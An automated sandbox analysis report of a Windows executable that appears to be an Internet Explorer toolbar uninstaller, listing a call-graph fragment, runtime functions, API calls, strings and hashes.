LeaveCriticalSection 3569->3683 3571 a2a9e 3571->3505 3574 a35b2 3572->3574 3573 a2c72 66 API calls 3576 a35d5 3573->3576 3574->3573 3575 a18cb 3574->3575 3575->3521 3575->3523 3577 a2c0a 6 API calls 3576->3577 3577->3575 3579 a354c 3578->3579 3581 a3553 3578->3581 3579->3581 3585 a3579 3579->3585 3580 a2c72 66 API calls 3582 a3558 3580->3582 3581->3580 3583 a2c0a 6 API calls 3582->3583 3584 a1794 3583->3584 3584->3539 3587 a2ae2 3584->3587 3585->3584 3586 a2c72 66 API calls 3585->3586 3586->3582 3639 a5320 3587->3639 3589 a2b0f IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 3590 a2beb GetCurrentProcess TerminateProcess 3589->3590 3592 a2bdf 3589->3592 3641 a10cc 3590->3641 3592->3590 3593 a17a5 3593->3539 3598 a3402 3594->3598 3595 a3406 3596 a1819 3595->3596 3597 a2c72 66 API calls 3595->3597 3596->3553 3596->3556 3599 a3422 3597->3599 3598->3595 3598->3596 3601 a344c 3598->3601 3600 a2c0a 6 API calls 3599->3600 3600->3596 3601->3596 3602 a2c72 66 API calls 3601->3602 3602->3599 3604 a338d 3603->3604 3605 a3394 3603->3605 3604->3605 3609 a33c8 3604->3609 3606 a2c72 66 API calls 3605->3606 3607 a3399 3606->3607 3608 a2c0a 6 API calls 3607->3608 3610 a183f 3608->3610 3609->3610 3611 a2c72 66 API calls 3609->3611 3610->3551 3610->3554 3611->3607 3613 a20f0 6 API calls 3612->3613 3614 a3223 3613->3614 3615 a3236 LoadLibraryA 3614->3615 3638 a32be 3614->3638 3616 a324b GetProcAddress 3615->3616 3619 a3360 3615->3619 3618 a3261 3616->3618 3616->3619 3617 a3313 3620 a20f9 6 API calls 3617->3620 3623 a207e 6 API calls 3618->3623 3619->3560 3620->3619 3621 a20f9 6 API calls 3632 a332b 3621->3632 3622 a20f9 6 API calls 3625 a32db 3622->3625 3624 a3267 GetProcAddress 3623->3624 3626 a207e 6 API calls 3624->3626 3627 a20f9 6 API calls 3625->3627 3628 a327c GetProcAddress 3626->3628 3630 a32e8 3627->3630 3629 a207e 6 API calls 3628->3629 3631 a3291 GetProcAddress 3629->3631 3630->3617 3630->3621 3633 a207e 6 API calls 3631->3633 3632->3617 3634 a20f9 6 API calls 3632->3634 3635 a32a6 3633->3635 3634->3617 3636 a32b0 GetProcAddress 3635->3636 3635->3638 3637 a207e 6 API calls 3636->3637 3637->3638 3638->3622 3638->3630 3640 a532c 3639->3640 3640->3589 3642 a10d6 IsDebuggerPresent 3641->3642 3643 a10d4 3641->3643 3649 a28d2 3642->3649 3643->3593 3646 a1358 SetUnhandledExceptionFilter UnhandledExceptionFilter 3647 a137d GetCurrentProcess TerminateProcess 3646->3647 3648 a1375 3646->3648 3647->3593 3648->3647 3649->3646 3651 a144e GetProcAddress 3650->3651 3652 a1463 ExitProcess 3650->3652 3651->3652 3653 a145e 3651->3653 3653->3652 3655 a5568 3654->3655 3664 a54c7 3654->3664 3656 a31eb 6 API calls 3655->3656 3657 a556e 3656->3657 3659 a2c72 65 API calls 3657->3659 3658 a18c4 65 API calls 3658->3664 3670 a5560 3659->3670 3660 a1719 65 API calls 3660->3664 3662 a5524 HeapAlloc 3662->3664 3663 a1465 3 API calls 3663->3664 3664->3658 3664->3660 3664->3662 3664->3663 3665 a5554 3664->3665 3666 a31eb 6 API calls 3664->3666 3668 a5559 3664->3668 3664->3670 3671 a5466 3664->3671 3667 a2c72 65 API calls 3665->3667 3666->3664 3667->3668 3669 a2c72 65 API calls 3668->3669 3669->3670 3670->3568 3672 a5472 3671->3672 3673 a54a3 3672->3673 3674 a2aa0 66 API calls 3672->3674 3673->3664 3675 a5488 3674->3675 3676 a4dc3 5 API calls 3675->3676 3677 a5493 3676->3677 3679 a54ac 3677->3679 3682 a29c6 LeaveCriticalSection 3679->3682 3681 a54b3 3681->3673 3682->3681 3683->3571 3685 a493d HeapReAlloc 3684->3685 3686 a4971 HeapAlloc 3684->3686 3687 a495f 3685->3687 3690 a495b 3685->3690 3688 a4994 VirtualAlloc 3686->3688 3686->3690 3687->3686 3689 a49ae HeapFree 3688->3689 3688->3690 3689->3690 3690->3439 3692 a49f1 VirtualAlloc 3691->3692 3694 a4a38 3692->3694 3694->3443 3695->3446 3696->3374 3715 a29c6 LeaveCriticalSection 3697->3715 3699 a227c 3699->3384 3701 a3cbf 3700->3701 3702 a3cbc InterlockedIncrement 3700->3702 3703 a3cc9 InterlockedIncrement 3701->3703 3704 a3ccc 3701->3704 3702->3701 3703->3704 3705 a3cd9 3704->3705 3706 a3cd6 InterlockedIncrement 3704->3706 3707 a3ce3 InterlockedIncrement 3705->3707 3709 a3ce6 3705->3709 3706->3705 3707->3709 3708 a3cff InterlockedIncrement 3708->3709 3709->3708 3710 a3d0f InterlockedIncrement 3709->3710 3711 a3d1a InterlockedIncrement 3709->3711 3710->3709 3711->3387 3716 a29c6 LeaveCriticalSection 3712->3716 3714 a22ca 3714->3389 3715->3699 3716->3714 3717->3251 3719 a368d 3718->3719 3722 a3694 3718->3722 3719->3722 3725 a36c0 3719->3725 3720 a2c72 66 API calls 3721 a3699 3720->3721 3723 a2c0a 6 API calls 3721->3723 3722->3720 3724 a36a8 3723->3724 3724->3285 3725->3724 3726 a2c72 66 API calls 3725->3726 3726->3721 3728 a2dc9 3727->3728 3729 a207e 6 API calls 3728->3729 3730 a2de1 3728->3730 3729->3728 3730->3293 3734 a2d70 3731->3734 3733 a2db9 3733->3295 3735 a2d7c 3734->3735 3742 a147d 3735->3742 3741 a2d9d 3741->3733 3743 a2aa0 66 API calls 3742->3743 3744 a1484 3743->3744 3745 a2c85 3744->3745 3746 a20f9 6 API calls 3745->3746 3747 a2c99 3746->3747 3748 a20f9 6 API calls 3747->3748 3749 a2ca9 3748->3749 3750 a2d2c 3749->3750 3765 a539a 3749->3765 3762 a2da6 3750->3762 3752 a207e 6 API calls 3753 a2d21 3752->3753 3756 a207e 6 API calls 3753->3756 3754 a2cc7 3755 a2ceb 3754->3755 3761 a2d13 3754->3761 3778 a377c 3754->3778 3755->3750 3758 a377c 72 API calls 3755->3758 3759 a2d01 3755->3759 3756->3750 3758->3759 3759->3750 3760 a207e 6 API calls 3759->3760 3760->3761 3761->3752 3827 a1486 3762->3827 3766 a53a6 3765->3766 3767 a53d3 3766->3767 3768 a53b6 3766->3768 3770 a5414 HeapSize 3767->3770 3771 a2aa0 66 API calls 3767->3771 3769 a2c72 66 API calls 3768->3769 3772 a53bb 3769->3772 3774 a53cb 3770->3774 3775 a53e3 3771->3775 3773 a2c0a 6 API calls 3772->3773 3773->3774 3774->3754 3783 a5434 3775->3783 3780 a3785 3778->3780 3781 a37c4 3780->3781 3782 a37a5 Sleep 3780->3782 3787 a569d 3780->3787 3781->3755 3782->3780 3786 a29c6 LeaveCriticalSection 3783->3786 3785 a540f 3785->3770 3785->3774 3786->3785 3788 a56a9 3787->3788 3789 a56be 3788->3789 3790 a56b0 3788->3790 3792 a56d1 3789->3792 3793 a56c5 3789->3793 3791 a54b5 66 API calls 3790->3791 3795 a56b8 3791->3795 3800 a5843 3792->3800 3821 a56de 3792->3821 3794 a35ee 66 API calls 3793->3794 3794->3795 3795->3780 3796 a5876 3799 a31eb 6 API calls 3796->3799 3797 a5848 HeapReAlloc 3797->3795 3797->3800 3798 a2aa0 66 API calls 3798->3821 3801 a587c 3799->3801 3800->3796 3800->3797 3802 a589a 3800->3802 3804 a31eb 6 API calls 3800->3804 3807 a5890 3800->3807 3803 a2c72 66 API calls 3801->3803 3802->3795 3805 a2c72 66 API calls 3802->3805 3803->3795 3804->3800 3806 a58a3 GetLastError 3805->3806 3806->3795 3809 a2c72 66 API calls 3807->3809 3811 a5811 3809->3811 3810 a5769 HeapAlloc 3810->3821 3811->3795 3812 a5816 GetLastError 3811->3812 3812->3795 3813 a57be HeapReAlloc 3813->3821 3814 a4dc3 5 API calls 3814->3821 3815 a5829 3815->3795 3817 a2c72 66 API calls 3815->3817 3816 a31eb 6 API calls 3816->3821 3819 a5836 3817->3819 3818 a580c 3820 a2c72 66 API calls 3818->3820 3819->3795 3819->3806 3820->3811 3821->3795 3821->3796 3821->3798 3821->3810 3821->3813 3821->3814 3821->3815 3821->3816 3821->3818 3822 a4614 VirtualFree VirtualFree HeapFree 3821->3822 3823 a57e1 3821->3823 3822->3821 3826 a29c6 LeaveCriticalSection 3823->3826 3825 a57e8 3825->3821 3826->3825 3830 a29c6 LeaveCriticalSection 3827->3830 3829 a148d 3829->3741 3830->3829 3832 a1561 3831->3832 3833 a2aa0 66 API calls 3832->3833 3834 a1568 3833->3834 3835 a1631 3834->3835 3836 a1594 3834->3836 3850 a166c 3835->3850 3838 a20f9 6 API calls 3836->3838 3840 a159f 3838->3840 3842 a1621 3840->3842 3844 a20f9 6 API calls 3840->3844 3841 a1669 3841->3312 3842->3835 3849 a15b4 3844->3849 3845 a1660 3846 a1465 3 API calls 3845->3846 3846->3841 3847 a20f9 6 API calls 3847->3849 3848 a20f0 6 API calls 3848->3849 3849->3842 3849->3847 3849->3848 3851 a164d 3850->3851 3852 a1672 3850->3852 3851->3841 3854 a29c6 LeaveCriticalSection 3851->3854 3855 a29c6 LeaveCriticalSection 3852->3855 3854->3845 3855->3851 3932 a5138 3933 a514a 3932->3933 3935 a5158 3932->3935 3934 a10cc 5 API calls 3933->3934 3934->3935 4405 a28fe 4406 a2901 4405->4406 4407 a51fb 68 API calls 4406->4407 4408 a290d 4407->4408 3936 a2d3f 3937 a3730 66 API calls 3936->3937 3938 a2d4b 3937->3938 3939 a207e 6 API calls 3938->3939 3940 a2d53 3939->3940 4357 a235f 4358 a236b 4357->4358 4359 a2383 4358->4359 4360 a246d 4358->4360 4361 a35ee 66 API calls 4358->4361 4362 a2391 4359->4362 4363 a35ee 66 API calls 4359->4363 4361->4359 4364 a239f 4362->4364 4365 a35ee 66 API calls 4362->4365 4363->4362 4366 a23ad 4364->4366 4367 a35ee 66 API calls 4364->4367 4365->4364 4368 a23bb 4366->4368 4369 a35ee 66 API calls 4366->4369 4367->4366 4370 a23c9 4368->4370 4371 a35ee 66 API calls 4368->4371 4369->4368 4372 a23d7 4370->4372 4373 a35ee 66 API calls 4370->4373 4371->4370 4374 a23e8 4372->4374 4375 a35ee 66 API calls 4372->4375 4373->4372 4376 a2aa0 66 API calls 4374->4376 4375->4374 4377 a23f0 4376->4377 4378 a23fc InterlockedDecrement 4377->4378 4379 a2415 4377->4379 4378->4379 4380 a2407 4378->4380 4393 a2479 4379->4393 4380->4379 4384 a35ee 66 API calls 4380->4384 4383 a2aa0 66 API calls 4385 a2429 4383->4385 4384->4379 4386 a245a 4385->4386 4387 a3d2d 8 API calls 4385->4387 4396 a2485 4386->4396 4391 a243e 4387->4391 4390 a35ee 66 API calls 4390->4360 4391->4386 4392 a3b55 66 API calls 4391->4392 4392->4386 4399 a29c6 LeaveCriticalSection 4393->4399 4395 a2422 4395->4383 4400 a29c6 LeaveCriticalSection 4396->4400 4398 a2467 4398->4390 4399->4395 4400->4398 3941 a543d 3942 a1411 66 API calls 3941->3942 3943 a5444 3942->3943 3944 a26b0 3945 a26e9 3944->3945 3946 a26dc 3944->3946 3948 a10cc 5 API calls 3945->3948 3947 a10cc 5 API calls 3946->3947 3947->3945 3956 a26f9 3948->3956 3949 a277c 3950 a2752 3950->3949 3951 a276c 3950->3951 3952 a10cc 5 API calls 3950->3952 3953 a10cc 5 API calls 3951->3953 3952->3951 3953->3949 3955 a27cb 3957 a27ff 3955->3957 3959 a10cc 5 API calls 3955->3959 3956->3949 3956->3950 3960 a51ca RtlUnwind 3956->3960 3958 a10cc 5 API calls 3957->3958 3958->3950 3959->3957 3960->3955 3867 a1391 3868 a13cd 3867->3868 3869 a13a3 3867->3869 3869->3868 3871 a28da 3869->3871 3872 a28e6 3871->3872 3877 a2345 3872->3877 3878 a22cc 66 API calls 3877->3878 3879 a234d 3878->3879 3880 a235a 3879->3880 3881 a1411 66 API calls 3879->3881 3882 a51fb 3880->3882 3881->3880 3883 a521a 3882->3883 3884 a5221 3882->3884 3885 a1719 66 API calls 3883->3885 3894 a2f92 3884->3894 3885->3884 3889 a530a 3918 a1697 3889->3918 3890 a5232 3890->3889 3892 a52ca SetUnhandledExceptionFilter UnhandledExceptionFilter 3890->3892 3892->3889 3895 a20f9 6 API calls 3894->3895 3896 a2f9d 3895->3896 3896->3890 3897 a2f9f 3896->3897 3900 a2fab 3897->3900 3898 a3007 3899 a2fe8 3898->3899 3903 a3016 3898->3903 3904 a20f9 6 API calls 3899->3904 3900->3898 3900->3899 3901 a2fd2 3900->3901 3906 a2fce 3900->3906 3902 a22cc 66 API calls 3901->3902 3907 a2fd7 3902->3907 3905 a2c72 66 API calls 3903->3905 3904->3907 3908 a301b 3905->3908 3906->3901 3906->3903 3909 a307d 3907->3909 3911 a1697 66 API calls 3907->3911 3917 a2fe0 3907->3917 3910 a2c0a 6 API calls 3908->3910 3912 a2aa0 66 API calls 3909->3912 3914 a3088 3909->3914 3910->3917 3911->3909 3912->3914 3913 a20f0 6 API calls 3915 a30bd 3913->3915 3914->3913 3914->3915 3921 a3113 3915->3921 3917->3890 3919 a1555 66 API calls 3918->3919 3920 a16a8 3919->3920 3922 a3119 3921->3922 3924 a3120 3921->3924 3925 a29c6 LeaveCriticalSection 3922->3925 3924->3917 3925->3924 3961 a31b4 3962 a31c0 SetLastError 3961->3962 3963 a31c8 3961->3963 3962->3963

                                                                          Executed Functions

                                                                          Function 000A1000 Relevance: 29.8, APIs: 13, Strings: 4, Instructions: 73libraryloadersynchronizationCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • CoInitialize.OLE32(00000000), ref: 000A1006
                                                                          • CreateMutexW.KERNELBASE(00000000,00000000,Global\IEToolbarUninstaller), ref: 000A1013
                                                                          • GetLastError.KERNEL32 ref: 000A101F
                                                                          • GetCommandLineW.KERNEL32(?), ref: 000A1040
                                                                          • CommandLineToArgvW.SHELL32(00000000), ref: 000A1047
                                                                          • PathFileExistsW.KERNELBASE(tbcore3.dll), ref: 000A1061
                                                                          • PathFileExistsW.KERNELBASE(tbcore3U.dll), ref: 000A1073
                                                                          • LoadLibraryW.KERNELBASE(?), ref: 000A1085
                                                                          • GetProcAddress.KERNEL32(00000000,MyUnregisterServer), ref: 000A1097
                                                                          • FreeLibrary.KERNELBASE(00000000), ref: 000A10A4
                                                                          • CloseHandle.KERNELBASE(00000000), ref: 000A10AB
                                                                          • CoUninitialize.COMBASE ref: 000A10B1
                                                                          • LocalFree.KERNEL32(00000000), ref: 000A10BC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000026.00000002.37248111598.00000000000A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000A0000, based on PE: true
                                                                          • Associated: 00000026.00000002.37248062161.00000000000A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248158774.00000000000A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248210674.00000000000AA000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248261539.00000000000AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_38_2_a0000_DXESuT.jbxd
                                                                          Similarity
                                                                          • API ID: CommandExistsFileFreeLibraryLinePath$AddressArgvCloseCreateErrorHandleInitializeLastLoadLocalMutexProcUninitialize
                                                                          • String ID: Global\IEToolbarUninstaller$MyUnregisterServer$tbcore3.dll$tbcore3U.dll
                                                                          • API String ID: 474438367-4110843154
                                                                          • Opcode ID: da4bf5db5f82bcd5042b6ff085593b764395252813ee9dd54568e57d7cceb871
                                                                          • Instruction ID: 8d27cc413cd2f936e7bb2d015e218e1e5a509a43192f0bf7554ad43dc44477d2
                                                                          • Opcode Fuzzy Hash: da4bf5db5f82bcd5042b6ff085593b764395252813ee9dd54568e57d7cceb871
                                                                          • Instruction Fuzzy Hash: 3611B132605A55ABA7A0ABE0AC0CEDF37ACBF47751B008625F642D6050DFA98945C7B2
                                                                          Function 000A1104 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetStartupInfoW.KERNEL32(?,000A93F0,00000058), ref: 000A1119
                                                                          • GetCommandLineW.KERNEL32 ref: 000A11AE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000026.00000002.37248111598.00000000000A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000A0000, based on PE: true
                                                                          • Associated: 00000026.00000002.37248062161.00000000000A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248158774.00000000000A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248210674.00000000000AA000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248261539.00000000000AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_38_2_a0000_DXESuT.jbxd
                                                                          Similarity
                                                                          • API ID: CommandInfoLineStartup
                                                                          • String ID: .$
                                                                          • API String ID: 582193876-2223841709
                                                                          • Opcode ID: 7d6bf9c21ff50eb3d7463347fe2739a0f548e4d5758e13e9eea9880e40bbbba0
                                                                          • Instruction ID: 4e07fe94396b278eb7309e5214613eb7419d875d6ced1ce0b50404dfddd15cd9
                                                                          • Opcode Fuzzy Hash: 7d6bf9c21ff50eb3d7463347fe2739a0f548e4d5758e13e9eea9880e40bbbba0
                                                                          • Instruction Fuzzy Hash: A931C870E417149ADB647BF59D86FEE76B4AF03B50F10453AF511AB0C3EA7489818B50
                                                                          Function 000A261B Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 81 a261b-a263d HeapCreate 82 a263f-a2640 81->82 83 a2641-a264a 81->83
                                                                          APIs
                                                                          • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 000A2630
                                                                          Memory Dump Source
                                                                          • Source File: 00000026.00000002.37248111598.00000000000A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000A0000, based on PE: true
                                                                          • Associated: 00000026.00000002.37248062161.00000000000A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248158774.00000000000A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248210674.00000000000AA000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248261539.00000000000AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_38_2_a0000_DXESuT.jbxd
                                                                          Similarity
                                                                          • API ID: CreateHeap
                                                                          • String ID:
                                                                          • API String ID: 10892065-0
                                                                          • Opcode ID: 72f693c28fe34551558ed3ed849f8812ecfd1d627ec01b959136fbf0e0e1f898
                                                                          • Instruction ID: 02f65f90582ee3140e66b3beaddcb1152f96aa3c43d8b1371a4d5d41a5f1349c
                                                                          • Opcode Fuzzy Hash: 72f693c28fe34551558ed3ed849f8812ecfd1d627ec01b959136fbf0e0e1f898
                                                                          • Instruction Fuzzy Hash: 3FD0A7325987445EFB405FB57C08B263BDCD385395F108435F90DC6152F678C590CB00
                                                                          Function 000A1465 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 84 a1465-a1476 call a143a ExitProcess
                                                                          APIs
                                                                            • Part of subcall function 000A143A: GetModuleHandleW.KERNEL32(mscoree.dll,?,000A1472,?,?,000A54EE,000000FF,0000001E,?,000A36FC,?,00000001,?,?,000A2A2A,00000018), ref: 000A1444
                                                                            • Part of subcall function 000A143A: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 000A1454
                                                                          • ExitProcess.KERNEL32 ref: 000A1476
                                                                          Memory Dump Source
                                                                          • Source File: 00000026.00000002.37248111598.00000000000A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000A0000, based on PE: true
                                                                          • Associated: 00000026.00000002.37248062161.00000000000A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248158774.00000000000A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248210674.00000000000AA000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248261539.00000000000AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_38_2_a0000_DXESuT.jbxd
                                                                          Similarity
                                                                          • API ID: AddressExitHandleModuleProcProcess
                                                                          • String ID:
                                                                          • API String ID: 75539706-0
                                                                          • Opcode ID: 6c500e945b744b5a9875ce19c789c6f2ec48452bf745e52b1e95a25ef15cf6aa
                                                                          • Instruction ID: 565f6ddcc5b1a4ad8b243174b1d1454c85a726e948722aae06cfda8e3eb3971a
                                                                          • Opcode Fuzzy Hash: 6c500e945b744b5a9875ce19c789c6f2ec48452bf745e52b1e95a25ef15cf6aa
                                                                          • Instruction Fuzzy Hash: 41B09231000208BBEB062F56DC0AC8D3F2AFB823A0B64C020F81849032DF72AD929A90

                                                                          Non-executed Functions

                                                                          Function 000A2AE2 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • IsDebuggerPresent.KERNEL32(?,?,00000314), ref: 000A2BBE
                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000314), ref: 000A2BC8
                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,00000314), ref: 000A2BD5
                                                                          • GetCurrentProcess.KERNEL32(C0000417,?,?,00000314), ref: 000A2BF0
                                                                          • TerminateProcess.KERNEL32(00000000,?,?,00000314), ref: 000A2BF7
                                                                          Memory Dump Source
                                                                          • Source File: 00000026.00000002.37248111598.00000000000A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000A0000, based on PE: true
                                                                          • Associated: 00000026.00000002.37248062161.00000000000A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248158774.00000000000A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248210674.00000000000AA000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248261539.00000000000AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_38_2_a0000_DXESuT.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                          • String ID:
                                                                          • API String ID: 2579439406-0
                                                                          • Opcode ID: a6d4ee05673fb4e6448620dfd732bcaa96d521f8af886c2fc49937730c319584
                                                                          • Instruction ID: 7c10f121de4f74ba24370182cc2cb2487b368ce0cd4930a843b310b73342bc54
                                                                          • Opcode Fuzzy Hash: a6d4ee05673fb4e6448620dfd732bcaa96d521f8af886c2fc49937730c319584
                                                                          • Instruction Fuzzy Hash: 1E31D4B49112289BDB60DFA4DD89BC8B7B8BF19304F5040EAE50CA6251EB785F848F54
                                                                          Function 000A10CC Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • IsDebuggerPresent.KERNEL32 ref: 000A1346
                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 000A135B
                                                                          • UnhandledExceptionFilter.KERNEL32(000A816C), ref: 000A1366
                                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 000A1382
                                                                          • TerminateProcess.KERNEL32(00000000), ref: 000A1389
                                                                          Memory Dump Source
                                                                          • Source File: 00000026.00000002.37248111598.00000000000A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000A0000, based on PE: true
                                                                          • Associated: 00000026.00000002.37248062161.00000000000A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248158774.00000000000A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248210674.00000000000AA000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248261539.00000000000AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_38_2_a0000_DXESuT.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                          • String ID:
                                                                          • API String ID: 2579439406-0
                                                                          • Opcode ID: 8e81c668e094bc847944421213fdc0115d9da4e631595f75ba16613495f1fc8f
                                                                          • Instruction ID: d4783b4fc977c390cc62b7ee041d42349e5d783df5a57e1767b2fba33a930ffd
                                                                          • Opcode Fuzzy Hash: 8e81c668e094bc847944421213fdc0115d9da4e631595f75ba16613495f1fc8f
                                                                          • Instruction Fuzzy Hash: 6021D2B4A01A04DFF791DF68ED44A543BB0BB0B352F00401AE54A9BAE1EB7C5985CF46
                                                                          Function 000A248E Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 112libraryloadermemoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 137 a248e-a24a0 GetModuleHandleW 138 a24a9-a24ad 137->138 139 a24a2-a24a8 call a13e1 137->139 141 a24b3-a24fa GetProcAddress * 4 138->141 142 a2611 call a21a8 138->142 139->138 144 a24fc-a2503 141->144 145 a2512-a2531 141->145 149 a2616 142->149 144->145 147 a2505-a250c 144->147 148 a2536-a2544 TlsAlloc 145->148 147->145 151 a250e-a2510 147->151 148->149 152 a254a-a2555 TlsSetValue 148->152 150 a2618-a261a 149->150 151->145 151->148 152->149 153 a255b-a25aa call a16cb call a207e * 4 call a2924 152->153 153->142 166 a25ac-a25c7 call a20f9 153->166 166->142 170 a25c9-a25db call a3730 166->170 170->142 173 a25dd-a25f4 call a20f9 170->173 173->142 177 a25f6-a260f call a21e5 GetCurrentThreadId 173->177 177->150
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 000A2498
                                                                          • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 000A24BF
                                                                          • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 000A24CC
                                                                          • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 000A24D9
                                                                          • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 000A24E6
                                                                          • TlsAlloc.KERNEL32 ref: 000A2536
                                                                          • TlsSetValue.KERNEL32(00000000), ref: 000A2551
                                                                          • GetCurrentThreadId.KERNEL32 ref: 000A2600
                                                                            • Part of subcall function 000A13E1: Sleep.KERNEL32(000003E8,00000000,?,000A2148,KERNEL32.DLL,?,000A2194,?,000A174F,00000003), ref: 000A13ED
                                                                            • Part of subcall function 000A13E1: GetModuleHandleW.KERNEL32(?,?,000A2148,KERNEL32.DLL,?,000A2194,?,000A174F,00000003,?,?,?,?,?,?,000A10F6), ref: 000A13F6
                                                                            • Part of subcall function 000A21A8: TlsFree.KERNEL32(0000000C,000A2616), ref: 000A21D3
                                                                            • Part of subcall function 000A21A8: DeleteCriticalSection.KERNEL32(00000000,00000000,KERNEL32.DLL,?,000A2616), ref: 000A298C
                                                                            • Part of subcall function 000A21A8: DeleteCriticalSection.KERNEL32(0000000C,KERNEL32.DLL,?,000A2616), ref: 000A29B6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000026.00000002.37248111598.00000000000A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000A0000, based on PE: true
                                                                          • Associated: 00000026.00000002.37248062161.00000000000A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248158774.00000000000A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248210674.00000000000AA000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000026.00000002.37248261539.00000000000AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_38_2_a0000_DXESuT.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$CriticalDeleteHandleModuleSection$AllocCurrentFreeSleepThreadValue
                                                                          • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                          • API String ID: 3695068788-3819984048
                                                                          • Opcode ID: 85bf28f2d4decceb9413d2265e4336bca24f9c627aba03daa016321c21b44eff
                                                                          • Instruction ID: e2fbfd16001ccffbbf9c40045958684b34f96b71374affb0c5acccbb60029b09
                                                                          • Opcode Fuzzy Hash: 85bf28f2d4decceb9413d2265e4336bca24f9c627aba03daa016321c21b44eff
                                                                          • Instruction Fuzzy Hash: F2318F31901F119AEB606BF9AD05A5A3FE4FB0B720B144639E514D72B3EF3C9451CB90
                                                                          Function 000A6070 Relevance: 16.8, APIs: 11, Instructions: 340COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
